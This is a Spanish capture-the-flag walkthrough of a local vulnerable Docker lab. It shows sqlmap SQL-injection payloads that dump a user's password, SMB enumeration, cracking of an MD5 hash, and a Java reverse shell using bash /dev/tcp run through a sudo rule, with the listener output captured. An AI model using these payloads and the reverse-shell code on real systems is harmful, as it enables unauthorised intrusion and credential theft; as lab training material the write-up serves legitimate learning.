Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipdatabase.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shdatabase.tar
Info:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
Info:
Si entramos en la pagina que tiene subida, vemos que hay un login, si probamos a un SQL Injection simple:
Veremos lo siguiente:
Por lo que es vulnerable, por lo que capturaremos la peticion con BurpSuite del login que sea erroneo admin:admin y lo volcaremos en un request.txt viendose algo asi:
Por lo que haremos lo siguiente:
sqlmap
Info:
Vemos que nos saca algunas bases de datos, entre ellas elegiremos la llamda register:
Info:
Sacamos la tabla users por lo que ahora sacaremos las columnas de dicha tabla:
Info:
Por lo que vemos hemos sacados las credenciales del usuario dylan, si probamos por SSH veremos que no funciona, por lo que listaremos los recursos compartidos de SMB:
smbclient
Info:
Y ahora probaremos a meternos con las credenciales de dylan al recurso compartido llamado shared:
Si metemos la contraseña KJSDFG789FGSDF78 veremos que estamos dentro y si hacemos un ls:
Por lo que nos descargamos el archivo con el siguiente comando:
Escalate user agustus
Y si leemos su contenido, veremos lo siguiente:
Vemos que es un hashMD5 aparentemente, por lo que si intentamos crackearlo:
URL = https://iotools.cloud/es/tool/md5-decrypt/
Veremos lo siguiente:
Por lo que podemos deducir que es la contraseña del nombre de usuario agusutus:
Si metemos la contraseña lovely veremos que estamos dentro.
Escalate user dylan
Si hacemos sudo -l y metemos la contraseña del usuario, veremos lo siguiente:
Por lo que podemos ejecutar el binario java como dylan, por lo que haremos lo siguiente:
Crearemos un archivo .java:
Lo guardamos y hacemos lo siguiente, tendremos que compilar el archivo a java para ejecutarlo posteriormente:
Nos preparamos a la escucha y lo ejecutamos:
Y si ahora volvemos a la escucha, veremos lo siguiente:
Escalate Privileges
Si buscamos permisos SUID:
Info:
Vemos que hay uno interesante llamado:
Por lo que haremos lo siguiente:
Con esto ya seremos root por lo que si hacemos whoami:
___
__H__
___ ___[,]_____ ___ ___ {1.8.7#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:21:42 /2024-12-13/
[10:21:42] [INFO] parsing HTTP request from 'request.txt'
[10:21:43] [WARNING] provided value for parameter 'submit' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:21:43] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/index.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[10:21:53] [INFO] testing if the target URL content is stable
[10:21:53] [WARNING] POST parameter 'name' does not appear to be dynamic
[10:21:53] [INFO] heuristic (basic) test shows that POST parameter 'name' might be injectable (possible DBMS: 'MySQL')
[10:21:53] [INFO] testing for SQL injection on POST parameter 'name'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[10:21:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:21:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:21:57] [INFO] testing 'Generic inline queries'
[10:21:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:21:57] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:21:57] [INFO] POST parameter 'name' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[10:21:57] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:21:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:21:57] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:21:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:21:57] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[10:21:57] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[10:21:57] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:21:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:21:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:21:58] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:21:58] [INFO] POST parameter 'name' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:21:58] [INFO] testing 'MySQL inline queries'
[10:21:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:22:48] [INFO] POST parameter 'name' appears to be 'MySQL >= 5.0.12 stacked queries (comment)' injectable
[10:22:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:23:38] [INFO] POST parameter 'name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:23:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:23:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:23:38] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:23:38] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[10:24:18] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[10:24:18] [INFO] testing 'MySQL UNION query (79) - 21 to 40 columns'
[10:24:19] [INFO] testing 'MySQL UNION query (79) - 41 to 60 columns'
[10:24:19] [INFO] testing 'MySQL UNION query (79) - 61 to 80 columns'
[10:24:20] [INFO] testing 'MySQL UNION query (79) - 81 to 100 columns'
[10:24:20] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 171 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: name=-1932' OR 2204=2204#&password=admin&submit=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=admin' OR (SELECT 6286 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT (ELT(6286=6286,1))),0x7176717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zlkZ&password=admin&submit=
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: name=admin';SELECT SLEEP(5)#&password=admin&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=admin' AND (SELECT 8652 FROM (SELECT(SLEEP(5)))mqiA)-- kdlu&password=admin&submit=
---
[10:24:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 22.04 (jammy)
web application technology: Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:24:22] [INFO] fetching database names
[10:24:22] [INFO] retrieved: 'information_schema'
[10:24:22] [INFO] retrieved: 'register'
[10:24:22] [INFO] retrieved: 'performance_schema'
[10:24:22] [INFO] retrieved: 'sys'
[10:24:22] [INFO] retrieved: 'mysql'
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] register
[*] sys
[10:24:22] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 10:24:22 /2024-12-13/
___
__H__
___ ___[.]_____ ___ ___ {1.8.7#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:28:17 /2024-12-13/
[10:28:17] [INFO] parsing HTTP request from 'request.txt'
[10:28:17] [WARNING] provided value for parameter 'submit' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:28:17] [INFO] resuming back-end DBMS 'mysql'
[10:28:17] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: name=-1932' OR 2204=2204#&password=admin&submit=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=admin' OR (SELECT 6286 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT (ELT(6286=6286,1))),0x7176717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zlkZ&password=admin&submit=
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: name=admin';SELECT SLEEP(5)#&password=admin&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=admin' AND (SELECT 8652 FROM (SELECT(SLEEP(5)))mqiA)-- kdlu&password=admin&submit=
---
[10:28:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 22.04 (jammy)
web application technology: Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:28:17] [INFO] fetching tables for database: 'register'
[10:28:17] [INFO] retrieved: 'users'
Database: register
[1 table]
+-------+
| users |
+-------+
[10:28:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 10:28:17 /2024-12-13/
___
__H__
___ ___[.]_____ ___ ___ {1.8.7#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:29:34 /2024-12-13/
[10:29:34] [INFO] parsing HTTP request from 'request.txt'
[10:29:34] [WARNING] provided value for parameter 'submit' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:29:34] [INFO] resuming back-end DBMS 'mysql'
[10:29:34] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: name=-1932' OR 2204=2204#&password=admin&submit=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=admin' OR (SELECT 6286 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT (ELT(6286=6286,1))),0x7176717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zlkZ&password=admin&submit=
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: name=admin';SELECT SLEEP(5)#&password=admin&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=admin' AND (SELECT 8652 FROM (SELECT(SLEEP(5)))mqiA)-- kdlu&password=admin&submit=
---
[10:29:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 22.04 (jammy)
web application technology: Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:29:34] [INFO] fetching columns for table 'users' in database 'register'
[10:29:34] [INFO] retrieved: 'username'
[10:29:34] [INFO] retrieved: 'varchar(30)'
[10:29:34] [INFO] retrieved: 'passwd'
[10:29:34] [INFO] retrieved: 'varchar(30)'
[10:29:34] [INFO] fetching entries for table 'users' in database 'register'
[10:29:34] [INFO] retrieved: 'KJSDFG789FGSDF78'
[10:29:34] [INFO] retrieved: 'dylan'
Database: register
Table: users
[1 entry]
+------------------+----------+
| passwd | username |
+------------------+----------+
| KJSDFG789FGSDF78 | dylan |
+------------------+----------+
[10:29:34] [INFO] table 'register.users' dumped to CSV file '/root/.local/share/sqlmap/output/172.17.0.2/dump/register/users.csv'
[10:29:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 10:29:34 /2024-12-13/
smbclient -L //<IP>/ -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shared Disk
IPC$ IPC IPC Service (dc5243b810a5 server (Samba, Ubuntu))
smbclient //<IP>/shared -U dylan
smb: \> ls
. D 0 Mon May 27 03:58:52 2024
.. D 0 Mon May 27 03:25:46 2024
augustus.txt N 33 Mon May 27 03:58:52 2024
82083148 blocks of size 1024. 56712468 blocks available
get augustus.txt
061fba5bdfc076bb7362616668de87c8
lovely
ssh augustus@<IP>
Matching Defaults entries for augustus on dc5243b810a5:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User augustus may run the following commands on dc5243b810a5:
(dylan) /usr/bin/java
cd /tmp
nano Shell.java
#Dentro del nano
public class Shell {
public static void main(String[] args) {
Process p;
try {
p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/<IP>/<PORT> 0>&1");
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
}
javac Shell.java
jar -cvfe Shell.jar Shell Shell.class
nc -lvnp <PORT>
sudo -u dylan /usr/bin/java -jar Shell.jar
listening on [any] 7777 ...
connect to [192.168.120.128] from (UNKNOWN) [172.17.0.2] 44782
dylan@dc5243b810a5:/tmp$
